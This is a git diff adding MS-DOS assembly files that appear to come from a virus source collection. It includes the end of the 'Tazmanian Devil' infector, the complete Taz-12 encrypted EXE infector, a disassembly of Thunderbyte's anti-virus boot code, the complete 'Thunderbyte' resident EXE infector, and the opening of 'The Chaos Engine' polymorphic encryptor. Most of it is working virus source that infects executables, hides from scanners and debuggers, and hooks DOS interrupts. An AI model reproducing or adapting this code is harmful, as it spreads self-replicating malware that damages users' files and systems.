+;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory $" +virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND ô Wsl!!* $" +virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $" +virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH A ADH ADH ADH ADH ADH ADH ADH ADH ADH $" +virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH DH ADH ADH ADH $" +virus_msg5 db cr,lf,"ADH ADH ADH AD ADH ADH AD AD AH AD ADH $" +virus_msg6 db cr,lf,"ADH ADH ADH A H ADH AD ADH AH ADH $" +virus_msg7 db cr,lf,"ADH ADH ADH ADH AD AD AH DH ADH $" +virus_msg8 db cr,lf,"ADH ADH ADH H AD AD AHADH $" +virus_msg9 db cr,lf,"ADH ADH AD ADH ADH ADH ADH ADH $" +virus_msg10 db cr,lf,"ADH ADH A DH ADH ADH ADH ADH $" +virus_msg11 db cr,lf,"ADH ADH ADH ADH ADH ADH$" +virus_msg12 db cr,lf,"ADH ADH AADH ADH ADH ADH$" +virus_msg13 db cr,lf,"ADH ADH AD H ADH ADH ADH$" +virus_msg14 db cr,lf,"ADH ADADH A DH ADH ADH ADH$" +virus_msg15 db cr,lf,"ADH ADH ADH H ADH ADH ADH ADH ADH$" +virus_msg16 db cr,lf,"ADH ADH ADH ADH H ADH ADH ADH ADH AHD ADH$" +virus_msg17 db cr,lf,"ADH ADH ADH AD ADH H ADH ADH ADH ADH ADH ADH$" +virus_msg18 db cr,lf,"ADH ADH H ADH ADDH ADH ADH ADH ADH ADH ADH$" +virus_msg19 db cr,lf,"ADADH ADH ADH ADH ADH ADH ADH$" +virus_msg20 db cr,lf,"DH ADH ADH ADH ADH ADH$" +virus_msg21 db cr,lf,"AADH ADH ADH ADH ADH ADH ADH$" +virus_msg22 db cr,lf,"AD DH ADH ADH ADH ADH ADH AD ADH ADH ADH$" +virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,2 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h + mov dx,offset virus_msg21 + int 21h + mov dx,offset virus_msg22 + int 21h + mov dx,offset virus_msg23 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz12.asm b/MSDOS/Virus.MSDOS.Unknown.taz12.asm new file mode 100644 index 00000000..da4c6ce7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz12.asm @@ -0,0 +1,252 @@ +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: + + call get_offset +get_offset: ;alternative way to get the delta + mov di,sp ;offset without activating any flags in + mov bp,word ptr ss:[di] ;TB-scan + sub bp,offset get_offset + inc sp + inc sp + + push ds ;save es & ds + push es + push cs ;and point ds to code segment + pop ds + + call encrypt_decrypt ;decrypt contents of file + +start_of_encryption: + cld ;clear direction flag + + mov ah,1ah ;set new dta area + lea dx,[bp+dta_area] + int 21h + + mov bx,es + push cs ;es points to code segment + pop es + + lea si,[bp+return2_buffer] ;this code prepares the return code + lea di,[bp+return_buffer] + movsw ;transfer buffer contents + lodsw + add ax,bx ;bx holds start es = psp + add ax,10h + stosw + +; lea di,[bp+stack_return] +; lea si,[bp+stack_save] ;si already points to stack_save + add di,8 ;saving a byte with this code + lodsw ;prepares the restore of ss/sp + add ax,bx + add ax,10h + stosw + movsw + + + mov ah,47h ;save starting directory + xor dl,dl + lea si,[bp+save_dir] + int 21h + +find_new_files: ;start finding files + mov ah,4eh + mov cx,7 + lea dx,[bp+search_pattern] +find_files: + int 21h + + jnc open_file ;if found a file + lea dx,[bp+dir_mask] ;else change directory + mov ah,3bh + int 21h + jnc find_new_files + jmp no_more_files ;end of all files + +open_file: ;open the found file + mov ax,3d02h + lea dx,[bp+dta_area+1eh] + int 21h + + xchg ax,bx ;file handle in bx + + mov ah,3fh ;read the exe header to exe_header + mov cx,18h + lea dx,[bp+exe_header] + int 21h + + lea si,[bp+exe_header] ;check if it's really a executable + lodsw + cmp ax,'ZM' + je check_infected + cmp ax,'MZ' + je check_infected + jmp no_exe ;else jump + +check_infected: + + add si,10h ;saving another byte +; lea si,[bp+exe_header+12h] + lodsw + cmp ax,'Ri' ;is it already infected? + jne start_infect + jmp already_infected + + +start_infect: + lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer + movsw + movsw + + lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save + movsw + movsw + + lea di,[bp+exe_header+12h] ;mark the file infected + mov ax,'Ri' + stosw + + mov al,2 ;go to end_of_file + call go_eof ;dx/ax is file length at return + + mov cx,10h ;use div to save bytes instead of speed + div cx + sub ax,word ptr ds:[bp+exe_header+8] + xchg dx,ax + stosw ;put new ip/cs in exe_header + xchg dx,ax + stosw + + inc ax ;put new suitable ss/sp in exe_header + inc ax + mov word ptr [bp+exe_header+0eh],ax + mov word ptr [bp+exe_header+10h],4b0h + + + mov ah,2ch ;get system time for random number + int 21h + xor dh,dh ;just alter the code a little bit + or dl,00001010b ;with encryption so TB-scan wont't + mov word ptr [bp+encryption_value],dx ;find garbage instruction + + mov ah,40h ;prepare to append virus to file + lea dx,[bp+start_of_virus] + call append_virus ;call it + + mov al,2 ;go to end of file + call go_eof + + mov cx,512 ;get filesize in 512 modules + div cx + inc ax + mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in + mov word ptr [bp+exe_header+4],ax ;exe header + + + xor al,al ;go to beginning of file + call go_eof + + mov ah,40h ;write new exe header + mov cx,18h + lea dx,[bp+exe_header] + int 21h + + lea si,[bp+dta_area+16h] ;restore time/date stamp + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +already_infected: +no_exe: + + mov ah,3eh ;close file + int 21h + + mov ax,4301h ;restore file attribute + mov cl,byte ptr [bp+dta_area+15h] + lea dx,[bp+dta_area+1eh] + int 21h + + mov ah,4fh ;find next file + jmp find_files + +no_more_files: + + lea dx,[bp+save_dir] ;restore starting directory + mov ah,3bh + int 21h + + pop es ;shrink memory block + mov ah,4ah + mov bx,10000 + int 21h + push es + + mov ah,48h ;allocate a new 3k block + mov bx,192 + int 21h + jc no_mem + dec ax + mov es,ax + mov word ptr es:[1],0008h ;mark DOS as owner and it will +no_mem: ;reduce available memory to DOS + + pop es ;restore old es/ds + pop ds + + cli ;must use this before altering ss/sp + mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp + mov sp,word ptr cs:[bp+stack_return+2] + sti ;interrupts allowed again + +end_part: +db 0eah ;jmp to original ip +return_buffer db 0,0,0,0 +return2_buffer dw 0,0fff0h ;code for carrier file to exit +stack_save dd ? +stack_return dd ? +dir_mask db '..',0 +search_pattern db '*.exe',0 +signature db "Taz-12 (C) 94 by Sector Infector!" +go_eof: ;procedure to go to beginning and + mov ah,42h ;end of file + xor cx,cx ;this saves a few bytes as it's + cwd ;used a few times + int 21h + ret +end_of_encryption: +pad db 0 ;pad out a byte so first byte of + ;encryption value won't be overwritten +encryption_value dw 0 + +encrypt_decrypt: ;cryptation routine + mov si,word ptr [bp+encryption_value] + lea di,[bp+start_of_encryption] + mov cx,(end_of_encryption-start_of_encryption+1)/2 +crypt_loop: + xor word ptr [di],si + inc di + inc di + loop crypt_loop + ret + +append_virus: + call encrypt_decrypt ;encrypt virus before write + mov cx,end_of_virus-start_of_virus ;cx is length of virus + int 21h ;call 40h + call encrypt_decrypt ;decrypt virus again + ret +end_of_virus: +exe_header db 18h dup(?) ;don't need to copy this shit +dta_area db 43 dup(?) ;to the next file to infect +save_dir db 64 dup(?) ;return adress is already saved! +cseg ends +end start_of_virus + + diff --git a/MSDOS/Virus.MSDOS.Unknown.tboot.asm b/MSDOS/Virus.MSDOS.Unknown.tboot.asm new file mode 100644 index 00000000..e2322395 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tboot.asm @@ -0,0 +1,171 @@ +;This is a disassembly of Thunderbyte's anti-viral partition code. +;An org statement was not used because it appears that all offsets used +;herein are either relative or absolute, i.e. it just doesn't matter. +;This should be compiled as a binary image file, it *WILL NOT* create +;an executable file. This code is exactly 512 bytes long and should be +;implanted into the hard drive at physical sector 1, cylinder 0, head 0 +;using the BIOS direct write to disk function. *DO NOT* use DOS write to +;disk functions or DEBUG because these functions can't access hidden sectors +;and you'll probably just overwrite the disk drive. + +;have fun, folks! + +code_start: + + cli ;no interrupts + xor cx, cx + mov ss, cx + mov sp, 7c00h + mov si, sp + sti + cld + + mov es, cx ;cs already equals 0 + mov ds, cx + + mov di, 0600h ; + + mov ch, 01 ;cx = 100h + repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h + ;to make room for boot sector + +jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label + ;i.e. 0000:061ah, wraps around segment +first_pt: ;when execution continues, this will be offset + ;061ah here + mov si, 06ddh + call routine_1 + mov si, 07eeh + call routine_2 + mov bp, si + mov si, 0733h + jb second_pt + + mov bx, sp ;buffer at stack pointer (7c00h?) + mov ax, 0201h ;func 2, 1 sector - possibily boot sector? + int 13h ;BIOS read sector + + mov si, 0725h +second_pt: + jb sixth_pt + + mov si, 745h + call routine_1 + call routine_1 + + mov si, 7c40h + mov cx, 01c0h +loop_1: + xchg ax, bx + shl bx, 1 + lodsb ;from 0000:7c40h + add ax, bx + mov ah, bh + test ah, ah + jns third_pt + xor ax, 0a097h +third_pt: + loop loop_1 + + cmp ax, 7805h + jnz fourth_pt + mov si, 0740h + call routine_1 + + mov si, 0762h + call 01cdh + mov dx, [si + 0fc9fh] + cmp dx, 27eh + jb fourth_pt + + mov si, 740h + call routine_1 + mov si, 774h + call routine_1 + + les ax, [004c] + mov bx, es + mov cl, 04 + shr ax, cl + add ax, bx + inc cx + inc cx + shl dx, cl + cmp ax, dx + jnb fifth_pt + +fourth_pt: + mov si, 0787h + call routine_1 + int 16h + mov si, 783h + or al, 20h + cmp al, 79h + jnz seventh_pt + +fifth_pt: + call routine_1 + mov si, bp + mov dx, [si] + jmp sp ;control goes to boot sector + +sixth_pt: + call routine_1 + int 16h + +seventh_pt: + int 18h ;rom BASIC! + +eighth_pt: + jmp eighth_pt ;infinite loop Lock Up! + + +routine_2: + lea di, [si - 30h] +boot_chk: + cmp byte ptr [si], 80h ;looks like check for bootable parttn + jz bootable + sub si, 10h + cmp si, di + jnb boot_chk + ret +bootable: + mov dx, [si] + mov cx, [si + 2] +return_pt: + ret + +routine_1: + lodsb + cbw ;convert to word + test ax, ax ;huh? + jz return_pt ;like ret to original caller + + mov ah, 0eh + xor bx, bx + push si + int 10h + pop si + jmp routine_1 + +code_end: + + msg1 db 13, 10, "Thunderbyte anti-virus partition " + db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0 + msg2 db "Disk error!", 13, 10, 00 + msg3 db "No system!", 13, 10, 00 + msg4 db "OK!", 13, 10,"Checking ",0 + msg5 db "bootsector CRC -> ",0 + msg6 db "available RAM -> ",0 + msg7 db "INT 13h -> ",0 + msg8 db "OK!",13, 10, 10, 0 + msg9 db "Failed!", 13, 10, "System might be infected. Continue? (N/Y)", 07, 0 + + misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h + db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0 + db 10h dup(0) + db 10h dup(0) + db 0eh dup(0) + + id_sig db 55h, 0aah + diff --git a/MSDOS/Virus.MSDOS.Unknown.tbyte.asm b/MSDOS/Virus.MSDOS.Unknown.tbyte.asm new file mode 100644 index 00000000..311f3943 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tbyte.asm @@ -0,0 +1,612 @@ +;*****************************************************************************; +; ; +; Tunderbyte Virus ; +; ; +; TBSCAN.DAT : DB3F00807609??4D75F9 ; +; ; +;*****************************************************************************; + +virus segment public 'code' + assume cs:virus, ds:virus, es:virus + org 0 + +VirusStart equ $ +VirusSize1 equ (VirusEnd1-$) +VirusSize2 equ (VirusEnd2-$) + +Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0 + db 80h,76h,Decrypt2-VirusStart-1,0 + db 4dh,75h,-7 +Decrypt2: cli + mov sp,offset DoAgain-2 + ret -8 + + db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0 + +Init: mov cx,(VirusEnd1-StartEncrypt+1)/2 + mov dl,byte ptr cs:Decrypt1[6] + mov dh,dl + mov si,offset StartEncrypt +NotReady: ret 2 + +DecryptWord: mov ax,ss:[si] + xor cs:[si],dx +NextWord: add dx,ax + inc si + ret -4 + + dw DecryptWord + dw DoAgain + dw NextWord + dw Init +DoAgain: loop NotReady + +StartEncrypt equ $ + +Main: mov sp,1000h + sti + push ds + push es + mov ax,03031h + mov bx,0DEADh + int 21h + cmp ax,0DEADh + jne Install + jmp Exit +Install: push es + mov ah,52h + int 21h + mov ax,es:[bx-2] + mov cs:FirstMCB,ax + pop es +CheckBlock: mov ds,ax + inc ax + cmp word ptr ds:[1],ax + jne NextBlock + cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) + jne NextBlock + push ax + push es + mov cx,VirusSize2 + xor di,di + mov es,ax + mov al,es:[di] + cld + repe scasb + pop es + pop ax + je CopyVirus +NextBlock: add ax,ds:[3] + cmp byte ptr ds:[0],'Z' + jne CheckBlock + mov ah,4ah + mov bx,-1 + int 21h + mov ah,4ah + sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1 + int 21h + mov ah,48h + mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) + int 21h +CopyVirus: push cs + pop ds + dec ax + mov es,ax + inc ax + mov es:[1],ax + mov cx,8 + mov si,offset CommandStr + mov di,cx + cld + rep movsb + mov es,ax +EncryptZero: inc byte ptr ds:Decrypt1[6] + jz EncryptZero + mov cx,VirusSize2 + xor si,si + xor di,di + cld + rep movsb + push es + call ReturnFar + xor ax,ax + mov ds,ax + cli + mov ax,offset DebugWatch + xchg ax,ds:[20h] + mov cs:OldInt8o,ax + mov ax,cs + xchg ax,ds:[22h] + mov cs:OldInt8s,ax + sti + push ds:[4] + push ds:[6] + mov word ptr ds:[4],offset Trace1 + mov word ptr ds:[6],cs + pushf + push cs + mov ax,offset Return4 + push ax + cli + pushf + pop ax + or ax,100h + push ax + push ds:[86h] + push ds:[84h] + mov ah,52h +Trace1: push bp + mov bp,sp + push ax + push ds + push cs + pop ds + mov ax,FirstMCB + cmp [bp+4],ax + jae Return1 + mov ax,[bp-2] + mov RegAX,ax + mov RegSP,bp + mov ax,[bp+2] + mov OldInt21o,ax + mov ax,[bp+4] + mov OldInt21s,ax + xor ax,ax + mov ds,ax + mov word ptr ds:[4],offset Trace2 + mov word ptr ds:[6],cs + jmp short Trace3 +Return1: jmp short Return3 +Trace2: push bp + mov bp,sp + push ax + push ds + cmp ax,cs:RegAX + jne Return3 + cmp bp,cs:RegSP + jne Return3 +Trace3: push bx + push dx + lds bx,[bp+2] + mov al,[bx] + mov dx,[bx+1] + inc dx + cmp al,0e9h + je JumpOpcode + cmp al,0e8h + je CallOpcode + xchg ax,dx + dec ax + cbw + xchg ax,dx + cmp al,0ebh + je JumpOpcode + cmp al,70h + jb Return2 + cmp al,7fh + ja Return2 +JumpOpcode: push ax + push ds + xor ax,ax + mov ds,ax + mov word ptr ds:[0c8h],offset HackJump + mov word ptr ds:[0cah],cs + jmp short Continue +CallOpcode: push ax + push ds + xor ax,ax + mov ds,ax + mov word ptr ds:[0c8h],offset HackCall + mov word ptr ds:[0cah],cs +Continue: pop ds + pop ax + mov cs:Displacement,dx + mov cs:Opcode,al + mov ax,32cdh + xchg ax,[bx] + mov cs:SavedCode,ax + mov cs:HackOffset,bx + mov cs:HackSegment,ds + and word ptr [bp+6],0feffh +Return2: pop dx + pop bx +Return3: pop ds + pop ax + pop bp + iret +Return4: pop ds:[6] + pop ds:[4] + mov cs:Handle,0 +Exit: pop es + pop ds + mov ax,ds + add ax,10h + add cs:OldCS,ax + add ax,cs:OldSP + mov dx,cs:OldSP + cli + mov ss,ax + mov sp,dx + sti + jmp cs:OldEntry + +ReturnFar: retf + +OldEntry equ this dword +OldIP dw 0 +OldCS dw -10h +OldSP dw 1000h +OldSS dw 0 + +HackAddress equ this dword +HackOffset dw ? +HackSegment dw ? +SavedCode dw ? + +HackJump: call Interrupt21 + push bp ; simulate a conditional or + push ax ; unconditional jump + mov bp,sp + mov ax,[bp+8] + and ax,0fcffh + push ax + db 0b8h ; mov ax,???? +Displacement dw 0 + popf +Opcode db 0ebh,3,0 ; j?? +3 + xor ax,ax + nop + add [bp+4],ax + pop ax + pop bp + iret + +HackCall: call Interrupt21 + sub sp,2 ; simulate a call + push bp + mov bp,sp + push ax + mov ax,[bp+4] + inc ax + xchg ax,[bp+8] + xchg ax,[bp+6] + xchg ax,[bp+4] + add ax,cs:Displacement + mov [bp+2],ax + pop ax + pop bp + iret + +Seek: mov ah,42h + xor cx,cx + xor dx,dx + +Dos: pushf + db 9ah +OldInt21o dw ? +OldInt21s dw ? + ret + +DosVersion: cmp ax,3031h + jne NotTByte + cmp bx,0DEADh + jne NotTByte + mov ax,0DEADh + add sp,8 + iret + +Interrupt21: cmp ah,30h + je DosVersion + push si + push ds + push cs:SavedCode + lds si,cs:HackAddress + pop ds:[si] + pop ds + pop si + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + cmp ah,3eh + je CloseFile + cmp ah,40h + je WriteFile +Old21: pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + push si + push ds + lds si,cs:HackAddress + mov word ptr ds:[si],32cdh + pop ds + pop si +NotTByte: ret + +WriteFile: mov ax,4400h + call Dos + cmp dl,7fh + ja Error1 + mov al,1 + call Seek + jc Error1 + or dx,dx + jnz Error1 + cmp ax,17h + ja Error1 + push cs + pop es + mov si,dx + mov di,offset Signature + add di,ax + cmp word ptr [si],"ZM" + jne Error1 + cmp word ptr [si+12h],0DEADh + je Error1 + cmp cx,18h + jb CheckHandle + or ax,ax + jz Ok +CheckHandle: cmp bx,cs:Handle + jne Error1 +Ok: add cx,ax + cmp cx,18h + jbe CountOk + mov cx,18h +CountOk: sub cx,ax + jbe Error1 + cld + rep movsb + mov cs:Handle,bx +Error1: jmp Old21 + +CloseFile: push cs + pop ds + push cs + pop es + mov ax,4400h + call Dos + test dl,80h + jne Error1 + or bx,bx + je Read + cmp cs:Handle,bx + je DoNotRead +Read: xor al,al + call Seek + jc Error1 + mov ah,3fh + mov cx,18h + mov dx,offset Signature + call Dos + jc Error1 +DoNotRead: mov cs:Handle,0 + cmp Signature,"ZM" + jne Error1 + cmp ChkSum,0DEADh + je Error1 + mov ax,ExeIP + mov OldIP,ax + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,ExeSP + mov OldSP,ax + mov al,2 + call Seek + jc Error1 + push ax + push dx + mov cx,200h + div cx + cmp PartPage,dx + jne SizeError + add dx,-1 + adc ax,0 + cmp PageCount,ax +SizeError: pop dx + pop ax + jne Error2 + add ax,0fh + adc dx,0 + and ax,0fff0h + mov cx,dx + mov dx,ax + mov ax,4200h + call Dos + jnc SeekOk +Error2: jmp Old21 +SeekOk: mov cx,10h + div cx + sub ax,HdrSize + mov ExeCS,ax + mov ExeIP,offset Decrypt1 + mov ExeSS,ax + mov ExeSP,VirusSize1+400h + cmp MinMem,40h + jae MemoryOk + mov MinMem,40h + cmp MaxMem,40h + jae MemoryOk + mov MaxMem,40h +MemoryOk: push ds + push es + mov ax,cs + mov ds,ax + add ax,(VirusSize2+0fh)/10h + mov es,ax + mov cx,VirusSize1 + xor si,si + xor di,di + cld + rep movsb + mov ds,ax + mov cx,offset StartEncrypt-Decrypt2 + mov dl,byte ptr ds:Decrypt1[6] + mov si,offset StartEncrypt-1 +Again1: xor ds:[si],dl + dec si + loop Again1 + mov cx,(VirusEnd1-StartEncrypt+1)/2 + mov dh,dl + mov si,offset StartEncrypt +Again2: xor ds:[si],dx + mov ax,ds:[si] + add dx,ax + inc si + add dx,ax + inc si + loop Again2 + mov ah,40h + mov cx,VirusSize1 + xor dx,dx + call Dos + pop ds + pop es + jc Error3 + mov al,2 + call Seek + jc Error3 + mov cx,200h + div cx + mov PartPage,dx + add dx,-1 + adc ax,0 + mov PageCount,ax + mov ChkSum,0DEADh + xor al,al + call Seek + jc Error3 + mov ah,40h + mov cx,18h + mov dx,offset Signature + call Dos +Error3: jmp Old21 + +Count dw 8 +DebugStr db 'DEBUG' +CommandStr db 'COMMAND ' + +DebugWatch: push ax + push cx + push dx + push si + push di + push ds + push es + dec cs:Count + jnz EndWatch + mov cs:Count,8 + mov ax,0b000h + mov ds,ax + mov cx,2 + push cs + pop es + cld +NextScreen: push cx + mov cx,2000 + xor si,si + mov di,offset DebugStr +NextChar1: mov dx,5 +NextChar2: lodsb + inc si + and al,0dfh + scasb + jne CharOk + dec dx + jnz NextChar2 +Alarm: pop cx + lds si,cs:HackAddress + cmp byte ptr ds:[si],0cdh + jne EndWatch + mov ax,cs:SavedCode + mov ds:[si],ax + xor cx,cx + mov ds,cx + mov ax,cs:OldInt8o + mov ds:[20h],ax + mov ax,cs:OldInt8s + mov ds:[22h],ax + mov es,cx + push cs + pop ds + mov cx,14 + mov si,offset EndWatch-2 + mov di,4f0h + push es + push di + rep movsb + xor di,di + mov cx,VirusSize2 + push cs + pop es + retf +CharOk: neg dx + add dx,5 + sbb di,dx + sub si,dx + sub si,dx + loop NextChar1 +ScreenOk: mov ax,ds + add ax,800h + mov ds,ax + pop cx + loop NextScreen + jmp short EndWatch + rep stosb +EndWatch: pop es + pop ds + pop di + pop si + pop dx + pop cx + pop ax + db 0eah +OldInt8o dw ? +OldInt8s dw ? + + db '***** (C) COPYRIGHT 1992 BY THE WRITER *****' + +VirusEnd1 equ $ + +FirstMCB dw ? +RegAX dw ? +RegSP dw ? + +Handle dw ? +Signature dw ? +PartPage dw ? +PageCount dw ? +ReloCnt dw ? +HdrSize dw ? +MinMem dw ? +MaxMem dw ? +ExeSS dw ? +ExeSP dw ? +ChkSum dw ? +ExeIP dw ? +ExeCS dw ? + +VirusEnd2 equ $ + +virus ends + +end Main + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.tce.asm b/MSDOS/Virus.MSDOS.Unknown.tce.asm new file mode 100644 index 00000000..ac7cf84e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tce.asm @@ -0,0 +1,862 @@ + radix 16 + +;***************************************** +;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 * +;***************************************** +;1995 - Sepultura - Australia +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;on CALLing of TCE - +;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH. +;;; 2 - Make Short Decryptor (No Junk). +;;; 4 - Add Segment Overide. +;;; +;;;CX = Length of Code to Encrypt. +;;;DX = Delta Offset. +;;;DS:SI = Code to encrypt (DS _MUST_ = CS). +;;;ES:DI = Location of Buffer to Create Decryptor in. +;;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;ON RETURN: +;;;ES = DS = Segment of Decryptor / Encrypted Code +;;;DX = Pointer to Start of Code +;;;CX = Length of Code +;;;;;;;;;;;;;;;;;;; +;;;Flag EQUates + +MAKE_SMALL equ 1 +PAD_TO_MAX equ 2 +ADD_SEG equ 4 + +;;;;;;;;;;;;;;;;;;; +;;;W.H.A.T.E.V.E.R + +DECRYPTOR_LENGTH equ 190h +MAX_PADDING equ 90h - 1f +length_1 equ (offset int_tbl - offset one_byters)-1 + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;REGISTER TABLE - INTEL STANDLE FORMAT + +tce_AX equ 0000xB +tce_CX equ 0001xB +tce_DX equ 0010xB +tce_BX equ 0011xB +tce_SP equ 0100xB +tce_BP equ 0101xB +tce_SI equ 0110xB +tce_DI equ 0111xB + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;THe BeLoW InSTuCTiOn CaN KilL A MaN + +db '[TCE-0.4]',0 + +;***************************************************** +;***************************************************** +;*** The REAL _REAL_ START of THE CHAOS 